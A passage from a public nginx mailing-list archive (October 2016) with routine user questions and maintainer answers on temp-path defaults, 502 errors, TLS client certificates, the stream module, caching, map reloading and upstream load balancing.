restarting nginx-XYZ.service, all files/directories are owned by XYZ: > ================================================================ > root at xxxx-web-03:/var/log/nginx# systemctl restart nginx-XYZ.service > root at xxxx-web-03:/var/log/nginx# ls -la /var/lib/nginx > total 28 > drwxr-xr-x 7 www-data www-data 4096 Oct 25 15:45 . > drwxr-xr-x 43 root root 4096 Oct 6 15:15 .. > drwx------ 2 XYZ www-data 4096 Oct 25 15:03 body > drwx------ 2 XYZ www-data 4096 Oct 6 14:43 fastcgi > drwx------ 9 XYZ www-data 4096 Oct 25 10:18 proxy > drwx------ 2 XYZ www-data 4096 Oct 6 14:43 scgi > drwx------ 2 XYZ www-data 4096 Oct 6 14:43 uwsgi > root at xxxx-web-03:/var/log/nginx# > ================================================================ > > I can't find the string /var/lib/nginx in any nginx Configuration file on the system: > ================================================================ > root at xxxx-web-03:/var/log/nginx# grep -r "/var/lib/nginx" /etc/nginx-XYZ/ > root at xxxx-web-03:/var/log/nginx# grep -r "/var/lib/nginx" /etc/nginx/ > root at xxxx-web-03:/var/log/nginx# > ================================================================ > > I can set all *_temp_path directories of the www-data nginx to an other direcory, > this is my current workaround for this issue. But i believe that the nginx shouldn't > touch /var/lib/ngin/* if this directory isn't in the configuration file. > > Any idea? Should i open a bug? Make sure to define temp paths in all servers, or, better yet, at http{} level. If you don't redefine them in some context, nginx will use the default paths compiled in, resulting in the behaviour you've observed. 
That is, something like this will work correctly, without touching compiled-in client_body_temp: http { server { listen 8080; client_body_temp_path /path/to/client_body_temp; } } But the configuration below will use both configured and compiled-in client_body_temp: http { server { listen 8080; client_body_temp_path /path/to/client_body_temp; } server { listen 8081; } } As previously suggested, best solution is to set relevant directives at http{} level: http { client_body_temp_path /path/to/client_body_temp; server { listen 8080; } server { listen 8081; } } -- Maxim Dounin http://nginx.org/ From 906717 at qq.com Tue Oct 25 15:24:27 2016 From: 906717 at qq.com (=?ISO-8859-1?B?QW5zd2Vy?=) Date: Tue, 25 Oct 2016 23:24:27 +0800 Subject: nginx 502 Message-ID: log_format access '$remote_addr - $remote_user [$time_local] "$request" $http_host $status $body_bytes_sent "$http_referer" "$http_x_forwarded_for" "$upstream_addr" "$upstream_status" $upstream_cache_status "$upstream_http_content_type" "$upstream_response_time" > $request_time "$http_user_agent" '; 180.106.101.115 - - [25/Oct/2016:22:53:52 +0800] "GET /Code?callback=a&userName=aa05ee5b9fdb HTTP/1.1" ab.com 502 67 "https://ab.com/login/ulogin.php?callback=loginCallback" "-" "192.168.0.116:443" "200" - "text/json; charset=UTF-8" "0.044" > 0.044 "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36 Core/1.47.1322.400 QQBrowser/9.4.9211.400" Why is upstream_status returned to the 200 state, while status returns is 502? Does it mean that the backend server is returned to normal, and nginx returns to the client is 502 bad gateway? Which aspect should proceed to look into the problem? -------------- next part -------------- An HTML attachment was scrubbed... URL: From jeremy.bjs2 at gmail.com Tue Oct 25 16:30:38 2016 From: jeremy.bjs2 at gmail.com (Jeremy Gates) Date: Tue, 25 Oct 2016 16:30:38 +0000 Subject: Does http pipeline prevent nginx from graceful shutdown active connections? Message-ID: Hi, all I found a recent code commit of Nginx fixed one issue that prevent nginx from graceful shutdown active connections for HTTP/2: http://hg.nginx.org/nginx/rev/5e95b9fb33b7 Just for curiosity, I was wondering if this is a problem for pipelined HTTP requests. Thanks, Jeremy -------------- next part -------------- An HTML attachment was scrubbed... URL: From vbart at nginx.com Tue Oct 25 16:40:30 2016 From: vbart at nginx.com (Valentin V. Bartenev) Date: Tue, 25 Oct 2016 19:40:30 +0300 Subject: Does http pipeline prevent nginx from graceful shutdown active connections? In-Reply-To: References: Message-ID: <3447244.r8ebcLiEtL@vbart-workstation> On Tuesday 25 October 2016 16:30:38 Jeremy Gates wrote: > Hi, all > > I found a recent code commit of Nginx fixed one issue that prevent nginx > from graceful shutdown active connections for HTTP/2: > > http://hg.nginx.org/nginx/rev/5e95b9fb33b7 > > Just for curiosity, I was wondering if this is a problem for pipelined HTTP > requests. No, there's no such problem with pipelined requests. Pipelined requests are processed sequentially one by one, nginx quits before starting processing the next request. wbr, Valentin V. 
Bartenev From nginx-forum at forum.nginx.org Tue Oct 25 23:20:00 2016 From: nginx-forum at forum.nginx.org (WGH) Date: Tue, 25 Oct 2016 19:20:00 -0400 Subject: Encrypting TLS client certificates` Message-ID: <196f1c6dc584f34f2fa0b0b184cd8426.NginxMailingListEnglish@forum.nginx.org> When nginx requests a client certificate with ssl_verify_client option, and client complies, the latter sends its certificate in plain text. Although it's just a public part of the certificate, one can consider it a kind of information disclosure, since user name, email, organization, etc. is transmitted in plain text. According to this stackexchange question - https://security.stackexchange.com/questions/80177/protecting-information-in-tls-client-certificates - it's technically possible to request client certificate after connection is encrypted. Is it possible to do that in nginx? Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270558,270558#msg-270558 From gfrankliu at gmail.com Tue Oct 25 23:28:22 2016 From: gfrankliu at gmail.com (Frank Liu) Date: Tue, 25 Oct 2016 16:28:22 -0700 Subject: round robin rule Message-ID: If I configure one "upstream" with 2 servers and use the default round robin, will the traffic be balanced based on the upstream or the virtual servers. e.g.: if I configure 2 virtual host "server" blocks, both proxy_pass the same upstream, will the requests to each virtual host be balanced individually? Assuming a test case where odd requests go to VH1 and even requests go to VH2, will VH1's traffic all be balanced upstream server1 and VH2's traffic all be balanced to upstream server2? Or will both VH1 and VH2 have 50%/50% on server1/server2? -------------- next part -------------- An HTML attachment was scrubbed... URL: From rainer at ultra-secure.de Wed Oct 26 00:11:30 2016 From: rainer at ultra-secure.de (Rainer Duffner) Date: Wed, 26 Oct 2016 02:11:30 +0200 Subject: Encrypting TLS client certificates` In-Reply-To: <196f1c6dc584f34f2fa0b0b184cd8426.NginxMailingListEnglish@forum.nginx.org> References: <196f1c6dc584f34f2fa0b0b184cd8426.NginxMailingListEnglish@forum.nginx.org> Message-ID: <82D7FC05-FC2C-4446-BC65-6D8D556FCB7F@ultra-secure.de> > Am 26.10.2016 um 01:20 schrieb WGH : > > When nginx requests a client certificate with ssl_verify_client option, > and client complies, the latter sends its certificate in plain text. > > Although it's just a public part of the certificate, one can consider it > a kind of information disclosure, since user name, email, organization, > etc. is transmitted in plain text. > > According to this stackexchange question - > https://security.stackexchange.com/questions/80177/protecting-information-in-tls-client-certificates > - it's technically possible to request client certificate after > connection is encrypted. > > Is it possible to do that in nginx? > Interesting. Is that also the case if you?ve got HSTS enabled? We have clients sending around ssl private keys by email (I wouldn?t be surprised if ?somebody? was harvesting those off the internet - but people usually don?t care?) - so your case is very much a luxury-problem for me. From obri at chaostreff.ch Wed Oct 26 08:47:20 2016 From: obri at chaostreff.ch (Daniel Aubry) Date: Wed, 26 Oct 2016 10:47:20 +0200 Subject: Bug? Chown of all default *_temp_path directories at startup? 
In-Reply-To: <20161025151009.GW73038@mdounin.ru> References: <20161025164534.1359d52f@wssyg666.sygroup-int.ch> <20161025151009.GW73038@mdounin.ru> Message-ID: <20161026104720.3729b887@wssyg666.sygroup-int.ch> On Tue, 25 Oct 2016 18:10:09 +0300 Maxim Dounin wrote: Hi Maxim > Make sure to define temp paths in all servers, or, better yet, at > http{} level. If you don't redefine them in some context, nginx > will use the default paths compiled in, resulting in the behaviour > you've observed. Many thanks for your answer, i had the setting at the server level, i've moved it to the http level, and it works now. Best Regards Daniel From nginx-forum at forum.nginx.org Wed Oct 26 13:28:59 2016 From: nginx-forum at forum.nginx.org (Michiel) Date: Wed, 26 Oct 2016 09:28:59 -0400 Subject: Upstream server error Message-ID: <28bd831f5b459f293d584e7df6395871.NginxMailingListEnglish@forum.nginx.org> Hi I'm having issues with Google Endpoints and NGINX. I keep on getting the following error message: 2016/10/26 13:02:09 [error] 15802#0: *1 connect() failed (111: Connection refused) while connecting to upstream, client: 78.20.209.87, server: , request: "GET /v1 HTTP/1.1", upstream: "http://127.0.0.1:8081/v1", host: "104.199.29.197" It seems like NGINX isn't listening to port 8081? Here's my configuration file (currently set up for testing): user nginx; worker_processes 1; worker_rlimit_nofile 65535; pid /run/nginx.pid; error_log /var/log/nginx/error.log notice; events { worker_connections 65535; } http { access_log /dev/null; rewrite_log on; sendfile on; tcp_nopush on; tcp_nodelay on; keepalive_timeout 65; types_hash_max_size 2048; server_tokens off; include /etc/nginx/mime.types; default_type application/octet-stream; limit_req_zone $binary_remote_addr zone=perip:10m rate=50r/s; limit_conn_zone $binary_remote_addr zone=peraddr:10m; server { listen 8081; server_name _; root /usr/share/nginx/api.puls.be; location / { return 200 '{status: "ok"}'; add_header application/json; } error_page 403 404 500 502 503 504 /404.html; location = /404.html { root error; } } } Any idea's on how to catch requests to the upstream server? Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270568,270568#msg-270568 From mdounin at mdounin.ru Wed Oct 26 15:08:00 2016 From: mdounin at mdounin.ru (Maxim Dounin) Date: Wed, 26 Oct 2016 18:08:00 +0300 Subject: Encrypting TLS client certificates` In-Reply-To: <196f1c6dc584f34f2fa0b0b184cd8426.NginxMailingListEnglish@forum.nginx.org> References: <196f1c6dc584f34f2fa0b0b184cd8426.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20161026150800.GE73038@mdounin.ru> Hello! On Tue, Oct 25, 2016 at 07:20:00PM -0400, WGH wrote: > When nginx requests a client certificate with ssl_verify_client option, > and client complies, the latter sends its certificate in plain text. > > Although it's just a public part of the certificate, one can consider it > a kind of information disclosure, since user name, email, organization, > etc. is transmitted in plain text. > > According to this stackexchange question - > https://security.stackexchange.com/questions/80177/protecting-information-in-tls-client-certificates > - it's technically possible to request client certificate after > connection is encrypted. > > Is it possible to do that in nginx? No. This process requires renegotiation, and renegotiation is explicitly rejected by nginx due to security implications it has. -- Maxim Dounin http://nginx.org/ From vbart at nginx.com Wed Oct 26 16:43:13 2016 From: vbart at nginx.com (Valentin V. 
Bartenev) Date: Wed, 26 Oct 2016 19:43:13 +0300 Subject: Upstream server error In-Reply-To: <28bd831f5b459f293d584e7df6395871.NginxMailingListEnglish@forum.nginx.org> References: <28bd831f5b459f293d584e7df6395871.NginxMailingListEnglish@forum.nginx.org> Message-ID: <3589533.AHdlFFWJRM@vbart-workstation> On Wednesday 26 October 2016 09:28:59 Michiel wrote: > Hi > > I'm having issues with Google Endpoints and NGINX. > I keep on getting the following error message: > > 2016/10/26 13:02:09 [error] 15802#0: *1 connect() failed (111: Connection > refused) while connecting to upstream, client: 78.20.209.87, server: , > request: "GET /v1 HTTP/1.1", upstream: "http://127.0.0.1:8081/v1", host: > "104.199.29.197" > > It seems like NGINX isn't listening to port 8081? > > Here's my configuration file (currently set up for testing): > > user nginx; > > worker_processes 1; > worker_rlimit_nofile 65535; > > pid /run/nginx.pid; > > error_log /var/log/nginx/error.log notice; > > events { > worker_connections 65535; > } > > http { > > access_log /dev/null; > rewrite_log on; > > sendfile on; > tcp_nopush on; > tcp_nodelay on; > keepalive_timeout 65; > types_hash_max_size 2048; > server_tokens off; > > include /etc/nginx/mime.types; > default_type application/octet-stream; > > limit_req_zone $binary_remote_addr zone=perip:10m rate=50r/s; > limit_conn_zone $binary_remote_addr zone=peraddr:10m; > > server { > > listen 8081; > server_name _; > root /usr/share/nginx/api.puls.be; > > location / { > return 200 '{status: "ok"}'; > add_header application/json; It should be: default_type application/json; > } > > error_page 403 404 500 502 503 504 /404.html; > location = /404.html { > root error; > } > > } > > } > > Any idea's on how to catch requests to the upstream server? > [..] The configuration above doesn't look like a valid one due to invalid "add_header" directive. Your nginx cannot load it. wbr, Valentin V. Bartenev From nginx-forum at forum.nginx.org Thu Oct 27 14:15:57 2016 From: nginx-forum at forum.nginx.org (etiennej) Date: Thu, 27 Oct 2016 10:15:57 -0400 Subject: Problem nginx perf Message-ID: <5285dd08dadcf098a0e030037379311f.NginxMailingListEnglish@forum.nginx.org> Hello ! I've got some strange behaviour testing nginx with gatling. My scenario is : 50 users over 1 second try to access one very simple html page (only "test" in it). nginx conf for conf.d/test.conf : server { listen 80; location /test { alias /var/www; index index.html;} } I find my results strange because access time go from 4ms to 366ms ! My configuration is pretty simple but it shouldn't be a problem for nginx to handle connections on such a simple request on 50 concurrent users ? I added these lines to the standard conf. In nginx.conf : keepalive_timeout 65; keepalive_requests 100000; sendfile on; tcp_nopush on; tcp_nodelay on; Number of workers is on auto. Is there something big i'm missing ? My server is 4 proc and 2 Go Ram. Needless to say this simple test doesn't overflow the ressources. Regards, Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270597,270597#msg-270597 From dragon_nat at hotmail.com Thu Oct 27 15:53:15 2016 From: dragon_nat at hotmail.com (Nattakorn S) Date: Thu, 27 Oct 2016 15:53:15 +0000 Subject: Receive raw data In-Reply-To: References: , Message-ID: Can I use http and stream in nginx.conf like this? http { ....... 
From nginx-forum at forum.nginx.org Thu Oct 27 14:15:57 2016 From: nginx-forum at forum.nginx.org (etiennej) Date: Thu, 27 Oct 2016 10:15:57 -0400 Subject: Problem nginx perf Message-ID: <5285dd08dadcf098a0e030037379311f.NginxMailingListEnglish@forum.nginx.org>

Hello!

I've got some strange behaviour testing nginx with Gatling. My scenario is: 50 users over 1 second try to access one very simple html page (only "test" in it).

nginx conf for conf.d/test.conf:

    server {
        listen 80;
        location /test {
            alias /var/www;
            index index.html;
        }
    }

I find my results strange because access times go from 4 ms to 366 ms! My configuration is pretty simple, but it shouldn't be a problem for nginx to handle such a simple request from 50 concurrent users?

I added these lines to the standard conf, in nginx.conf:

    keepalive_timeout 65;
    keepalive_requests 100000;
    sendfile on;
    tcp_nopush on;
    tcp_nodelay on;

The number of workers is on auto. Is there something big I'm missing? My server has 4 cores and 2 GB of RAM. Needless to say, this simple test doesn't exhaust the resources.

Regards,

Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270597,270597#msg-270597

From dragon_nat at hotmail.com Thu Oct 27 15:53:15 2016 From: dragon_nat at hotmail.com (Nattakorn S) Date: Thu, 27 Oct 2016 15:53:15 +0000 Subject: Receive raw data In-Reply-To: References: Message-ID:

Can I use http and stream in nginx.conf like this?

    http {
        .......
    }

________________________________
From: nginx on behalf of Richard Stanway
Sent: Monday, October 24, 2016 10:25 PM
To: nginx at nginx.org
Subject: Re: Receive raw data

Nginx will need a valid header in order to know what to do with the request. Maybe you should look into the stream module instead.

https://nginx.org/en/docs/stream/ngx_stream_core_module.html

On Mon, Oct 24, 2016 at 2:56 PM, Nattakorn S wrote:

Dear all

I have an electronic device configured to send raw TCP/IP data (no HTTP header) to my server. My server uses nginx with FastCGI as the web server, and my application gets messages on port 8080. But nginx always responds with error 400: "client sent invalid method while reading client request line". I know the cause: my device does not put a correct header in the packet. So I tried adding "ignore_invalid_headers off;" in the http scope, but it did not work. I need to pass the raw data through to my application.

Thank you.

From dragon_nat at hotmail.com Thu Oct 27 15:54:49 2016 From: dragon_nat at hotmail.com (Nattakorn S) Date: Thu, 27 Oct 2016 15:54:49 +0000 Subject: Receive raw data In-Reply-To: References: Message-ID:

Can I use http and stream like this

    http {
        ......................
    }

    stream {
        ......................
    }

in the same nginx.conf?

Thank you

________________________________
From: nginx on behalf of Richard Stanway
Sent: Monday, October 24, 2016 10:25 PM
To: nginx at nginx.org
Subject: Re: Receive raw data

Nginx will need a valid header in order to know what to do with the request. Maybe you should look into the stream module instead.

https://nginx.org/en/docs/stream/ngx_stream_core_module.html

[..]
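For what it's worth, the answer is yes: http{} and stream{} are sibling top-level contexts, so both can appear in one nginx.conf (provided nginx was built with the stream module). A minimal sketch, reusing the ports from the question:

    events { }

    http {
        server {
            listen 8081;
            # ... HTTP virtual servers ...
        }
    }

    stream {
        server {
            listen 8080;
            proxy_pass 127.0.0.1:9090;
        }
    }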
From nginx-forum at forum.nginx.org Thu Oct 27 18:41:34 2016 From: nginx-forum at forum.nginx.org (seo010) Date: Thu, 27 Oct 2016 14:41:34 -0400 Subject: Pre-compressed (gzip) HTML using fastcgi_cache? Message-ID: <4521b802d545803df2ad2333acd6c95a.NginxMailingListEnglish@forum.nginx.org>

Hi!

I was wondering if anyone has an idea to serve pre-compressed (gzip) HTML using proxy_cache / fastcgi_cache.

I tried a solution with a map of http_accept_encoding as part of the fastcgi_cache_key, with gzip-compressed output from the script, but it resulted in strange behavior (the MD5 hash for the first request corresponds to the KEY; the next requests use an unknown MD5 hash for the same KEY).

Nginx version: 1.11.1

The initial solution to serve pre-compressed gzip HTML from proxy_cache / fastcgi_cache was the following:

Map:

    map $http_accept_encoding $gzip_enabled {
        ~*gzip gzip;
    }

Server:

    fastcgi_cache_path /path/to/cache/nginx levels=1:2 keys_zone=XXX:20m max_size=4g inactive=7d;

PHP-FPM proxy:

    set $cache_key "$gzip_enabled$request_method$request_uri";

    fastcgi_pass unix:/path/to/php-fpm.sock;
    fastcgi_index index.php;
    fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
    fastcgi_param PHP_VALUE "error_log=/path/to/logs/php.error.log";
    fastcgi_intercept_errors on;

    # full page cache
    fastcgi_no_cache $skip_cache_save;
    fastcgi_cache_bypass $skip_cache;
    fastcgi_cache XXX;
    fastcgi_cache_use_stale error timeout invalid_header updating http_500;
    fastcgi_ignore_headers Cache-Control Expires Set-Cookie;
    fastcgi_cache_valid 200 7d; # valid for 7 days
    fastcgi_cache_valid 301 302 304 1h;
    fastcgi_cache_valid any 5m;
    fastcgi_cache_lock on;
    fastcgi_cache_lock_timeout 5s;
    fastcgi_cache_key $cache_key;

    add_header X-Cache $upstream_cache_status;
    #add_header X-Cache-Key $cache_key;

    include fastcgi_params;

It did work when testing in one browser: it showed "MISS" and "HIT" for 2 requests. The cache directory showed the correct MD5 hash for the key.

But when testing the same URL again in a different browser, a yet unexplained behavior occurred. A totally new MD5 hash was used to store the same pre-compressed content. When viewing the cached file, the exact same KEY was shown (without additional spaces or special characters).

Although the solution with a GZIP parameter may work, I was wondering if anyone knows of a better solution to serve pre-compressed HTML from the Nginx cache, as it results in a 4 to 10 ms latency saving per request on an idle quad-core server with 4x SSD in RAID 10.

I could not find any information related to a solution in Google, while it appears to be a major potential performance gain for high-traffic websites.

Best Regards,
Jan Jaap

Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270604,270604#msg-270604

From eric.cox at kroger.com Thu Oct 27 19:44:56 2016 From: eric.cox at kroger.com (Cox, Eric S) Date: Thu, 27 Oct 2016 19:44:56 +0000 Subject: Dynamically Reload Map Message-ID: <74A4D440E25E6843BC8E324E67BB3E394558128B@N060XBOXP38.kroger.com>

Is anyone aware of a way to dynamically reload a file when using the MAP module without having to reload the server? We have a file that gets updated roughly every minute that needs to be reloaded, and it seems that doing a reload every minute on the server processes might cause a performance issue.

Also, is anyone aware of a way to view the current size of the map hash tables?

Thanks
From alex at samad.com.au Thu Oct 27 23:19:23 2016 From: alex at samad.com.au (Alex Samad) Date: Fri, 28 Oct 2016 10:19:23 +1100 Subject: nginx and FIX server Message-ID:

Hi

Has anyone set up nginx in front of a FIX engine to do rate limiting?

Alex

From zxcvbn4038 at gmail.com Fri Oct 28 00:57:02 2016 From: zxcvbn4038 at gmail.com (CJ Ess) Date: Thu, 27 Oct 2016 20:57:02 -0400 Subject: nginx and FIX server In-Reply-To: References: Message-ID:

FIX as in the Financial Information eXchange protocol?

On Thu, Oct 27, 2016 at 7:19 PM, Alex Samad wrote:
> Hi
>
> Has anyone set up nginx in front of a FIX engine to do rate limiting?
>
> Alex

From alex at samad.com.au Fri Oct 28 03:22:39 2016 From: alex at samad.com.au (Alex Samad) Date: Fri, 28 Oct 2016 14:22:39 +1100 Subject: nginx and FIX server In-Reply-To: References: Message-ID:

Yep

On 28 October 2016 at 11:57, CJ Ess wrote:
> FIX as in the Financial Information eXchange protocol?
> [..]

From zxcvbn4038 at gmail.com Fri Oct 28 05:15:19 2016 From: zxcvbn4038 at gmail.com (CJ Ess) Date: Fri, 28 Oct 2016 01:15:19 -0400 Subject: nginx and FIX server In-Reply-To: References: Message-ID:

Maybe this is what you want: https://nginx.org/en/docs/stream/ngx_stream_proxy_module.html

See the parts about proxy_download_rate and proxy_upload_rate

On Thu, Oct 27, 2016 at 11:22 PM, Alex Samad wrote:
> Yep
>
> On 28 October 2016 at 11:57, CJ Ess wrote:
> > FIX as in the Financial Information eXchange protocol?
> > [..]
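A sketch of the stream-module rate limiting CJ points to; the listener port, backend address and rates are hypothetical, and both limits apply per connection:

    stream {
        server {
            listen 9878;                # hypothetical FIX listener port
            proxy_download_rate 512k;   # limit data read from the backend, per connection
            proxy_upload_rate   512k;   # limit data read from the client, per connection
            proxy_pass 10.0.0.5:9878;   # hypothetical FIX engine address
        }
    }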
From alex at samad.com.au Fri Oct 28 05:29:41 2016 From: alex at samad.com.au (Alex Samad) Date: Fri, 28 Oct 2016 16:29:41 +1100 Subject: nginx and FIX server In-Reply-To: References: Message-ID:

Hi

Yeah, I have had a very quick look; just wondering if anyone on the list had set one up.

Alex

On 28 October 2016 at 16:15, CJ Ess wrote:
> Maybe this is what you want:
> https://nginx.org/en/docs/stream/ngx_stream_proxy_module.html
>
> See the parts about proxy_download_rate and proxy_upload_rate
> [..]

From nginx-forum at forum.nginx.org Fri Oct 28 10:11:47 2016 From: nginx-forum at forum.nginx.org (etiennej) Date: Fri, 28 Oct 2016 06:11:47 -0400 Subject: Problem nginx perf In-Reply-To: <5285dd08dadcf098a0e030037379311f.NginxMailingListEnglish@forum.nginx.org> References: <5285dd08dadcf098a0e030037379311f.NginxMailingListEnglish@forum.nginx.org> Message-ID: <04bed1bdc73dc41a393dabdcf5fe1843.NginxMailingListEnglish@forum.nginx.org>

I noticed the first one or two requests are always the slowest, and then the normal (fast) behavior follows. Anything I should know about that?

Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270597,270618#msg-270618

From dragon_nat at hotmail.com Fri Oct 28 11:16:03 2016 From: dragon_nat at hotmail.com (Nattakorn S) Date: Fri, 28 Oct 2016 11:16:03 +0000 Subject: Nginx with ngx_stream_core_module Message-ID:

Dear all

I have an electronic device configured to send raw TCP/IP data (no HTTP header) to my server. My server uses nginx, configured to use the ngx_stream_core_module like this:

    stream {
        server {
            listen 127.0.0.1:8080;
            proxy_pass 127.0.0.1:9090;
            proxy_buffer_size 16k;
        }
    }

I run a FastCGI server on port 9090. How do I configure nginx to send transactions from 8080 to the FastCGI server on 9090?

Thank you.

From mdounin at mdounin.ru Fri Oct 28 11:31:06 2016 From: mdounin at mdounin.ru (Maxim Dounin) Date: Fri, 28 Oct 2016 14:31:06 +0300 Subject: Nginx with ngx_stream_core_module In-Reply-To: References: Message-ID: <20161028113106.GV73038@mdounin.ru>

Hello!

On Fri, Oct 28, 2016 at 11:16:03AM +0000, Nattakorn S wrote:

> I have an electronic device configured to send raw TCP/IP data (no
> HTTP header) to my server.
>
> My server uses nginx, configured to use the ngx_stream_core_module
> like this:
>
>     stream {
>         server {
>             listen 127.0.0.1:8080;
>             proxy_pass 127.0.0.1:9090;
>             proxy_buffer_size 16k;
>         }
>     }
>
> I run a FastCGI server on port 9090. How do I configure nginx to send
> transactions from 8080 to the FastCGI server on 9090?

The stream module is to route raw TCP/IP streams, while what you want to do requires converting a raw stream into a FastCGI request. This is not something you can do using the stream module.

-- Maxim Dounin http://nginx.org/
From dragon_nat at hotmail.com Fri Oct 28 12:47:53 2016 From: dragon_nat at hotmail.com (Nattakorn S) Date: Fri, 28 Oct 2016 12:47:53 +0000 Subject: Re: Nginx with ngx_stream_core_module Message-ID:

Thank you Maxim

I tried to use the stream module because the http module does not work with raw incoming TCP/IP. I always got error 400 and the transaction was not sent from nginx to my app, so I tried the stream module. My app is developed with FCGI. So if you mean my app cannot accept raw TCP/IP data, I'll try to change my app. Please suggest how to develop a C++ app that receives the stream without FastCGI.

Thank you

Sent from Samsung Mobile

-------- Original message --------
From: Maxim Dounin
Date: 28/10/2016 18:31 (GMT+07:00)
To: nginx at nginx.org
Subject: Re: Nginx with ngx_stream_core_module

Hello!

[..]

The stream module is to route raw TCP/IP streams, while what you want to do requires converting a raw stream into a FastCGI request. This is not something you can do using the stream module.

-- Maxim Dounin http://nginx.org/

From nginx-forum at forum.nginx.org Fri Oct 28 13:12:31 2016 From: nginx-forum at forum.nginx.org (stuwat) Date: Fri, 28 Oct 2016 09:12:31 -0400 Subject: Nginx proxy_pass not working as expected. Message-ID:

Hi

I have the virtualhost file configured as the following:

    server {
        server_name example.com;

        location / {
            proxy_pass http://example.org;
        }
    }

When I visit example.com it redirects correctly to example.org, but I need it to show example.com in the address bar. How can I do this?

I tried changing it to

    location / {
        proxy_pass http://example.org;
        proxy_set_header Host example.com;
    }

but it still shows example.org in the address bar. What do I need to do?

Thanks

Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270626,270626#msg-270626

From jeff.dyke at gmail.com Fri Oct 28 14:02:19 2016 From: jeff.dyke at gmail.com (Jeff Dyke) Date: Fri, 28 Oct 2016 10:02:19 -0400 Subject: Nginx proxy_pass not working as expected. In-Reply-To: References: Message-ID:

You may want to define example.org as an upstream if it is just an application server that handles requests, but I'm not entirely sure what you're trying to accomplish...

    upstream anything.you.want {
        server 127.0.0.1:PORT; # or a domain name
    }

    server {
        server_name example.com;
        location / {
            proxy_pass http://anything.you.want;
        }
    }

HTH
Jeff

On Fri, Oct 28, 2016 at 9:12 AM, stuwat wrote:
> Hi
>
> I have the virtualhost file configured as the following:
> [..]
>
> but it still shows example.org in the address bar. What do I need to do?
>
> Thanks
>
> Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270626,270626#msg-270626
From nginx-forum at forum.nginx.org Fri Oct 28 14:17:11 2016 From: nginx-forum at forum.nginx.org (stuwat) Date: Fri, 28 Oct 2016 10:17:11 -0400 Subject: Nginx proxy_pass not working as expected. In-Reply-To: References: Message-ID: <7da33840ac5157f6693bad4e5b855739.NginxMailingListEnglish@forum.nginx.org>

We're trying to point example.com at a site hosted at GitHub...

So we need example.com to point to the site hosted at example.github.io

So when a user visits example.com they get the page hosted at example.github.com, but with example.com still in the address bar.

HTH
Stuart

Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270626,270629#msg-270629

From zxcvbn4038 at gmail.com Fri Oct 28 15:48:29 2016 From: zxcvbn4038 at gmail.com (CJ Ess) Date: Fri, 28 Oct 2016 11:48:29 -0400 Subject: nginx and FIX server In-Reply-To: References: Message-ID:

Cool. Probably off topic, but why rate limit FIX? My solution for heavy traders was always to put them on their own hardware and pass the costs back to them. They are usually invested in whatever strategy they are using and happy to pay up.

On Fri, Oct 28, 2016 at 1:29 AM, Alex Samad wrote:
> Hi
>
> Yeah, I have had a very quick look; just wondering if anyone on the
> list had set one up.
>
> Alex
> [..]

From francis at daoine.org Fri Oct 28 16:32:14 2016 From: francis at daoine.org (Francis Daly) Date: Fri, 28 Oct 2016 17:32:14 +0100 Subject: Nginx proxy_pass not working as expected. In-Reply-To: <7da33840ac5157f6693bad4e5b855739.NginxMailingListEnglish@forum.nginx.org> References: <7da33840ac5157f6693bad4e5b855739.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20161028163214.GA23518@daoine.org>

On Fri, Oct 28, 2016 at 10:17:11AM -0400, stuwat wrote:

Hi there,

> We're trying to point example.com at a site hosted at GitHub...

In general, you proxy_pass to something that you control.

> So we need example.com to point to the site hosted at example.github.io
>
> So when a user visits example.com they get the page hosted at example.github.com,
> but with example.com still in the address bar.

You have listed two different github domains there. And neither matches the domain in your example config.

Right now, if I "curl -v http://example.github.com", I get a http redirect to http://example.github.io/. When your nginx does that, it will get the same response, and pass it to the browser. And then the browser will make a fresh request to example.github.io which does not go anywhere near your nginx.

Perhaps if you did a proxy_pass to http://example.github.io it would work better? (At least, until that remote web site chooses to redirect you somewhere else as well.)

f
-- Francis Daly francis at daoine.org
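A sketch of the configuration Francis suggests; the proxy_set_header line is an assumption on top of his proxy_pass suggestion, on the reasoning that GitHub Pages selects the site by Host, so passing example.com upstream would not match:

    server {
        server_name example.com;

        location / {
            proxy_pass http://example.github.io;
            proxy_set_header Host example.github.io;
        }
    }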
From francis at daoine.org Fri Oct 28 16:42:32 2016 From: francis at daoine.org (Francis Daly) Date: Fri, 28 Oct 2016 17:42:32 +0100 Subject: round robin rule In-Reply-To: References: Message-ID: <20161028164232.GB23518@daoine.org>

On Tue, Oct 25, 2016 at 04:28:22PM -0700, Frank Liu wrote:

Hi there,

> If I configure one "upstream" with 2 servers and use the default round
> robin, will the traffic be balanced based on the upstream or the virtual
> servers. e.g.: if I configure 2 virtual host "server" blocks, both
> proxy_pass the same upstream, will the requests to each virtual host be
> balanced individually?

That sounds like it shouldn't be too difficult to test.

Have your upstream refer to two different nginx server blocks, and be able to identify in the logs which server was used. Then send a request to vhost1, to vhost2, to vhost1, and to vhost1 again.

Did the first two to vhost1 go to the same upstream? And did the last to vhost1 go to the other upstream?

I'll be interested in seeing your conclusions.

Good luck with it,

f
-- Francis Daly francis at daoine.org

From tolga.ceylan at gmail.com Fri Oct 28 17:46:31 2016 From: tolga.ceylan at gmail.com (Tolga Ceylan) Date: Fri, 28 Oct 2016 10:46:31 -0700 Subject: round robin rule In-Reply-To: <20161028164232.GB23518@daoine.org> References: <20161028164232.GB23518@daoine.org> Message-ID:

> On Tue, Oct 25, 2016 at 04:28:22PM -0700, Frank Liu wrote:
>
> > If I configure one "upstream" with 2 servers and use the default round
> > robin, will the traffic be balanced based on the upstream or the virtual
> > servers. e.g.: if I configure 2 virtual host "server" blocks, both
> > proxy_pass the same upstream, will the requests to each virtual host be
> > balanced individually?

Conceptually, the rr algorithm runs after 'proxy_pass', so the overall load would be 50%/50% even if more than one proxy_pass references the same upstream block.
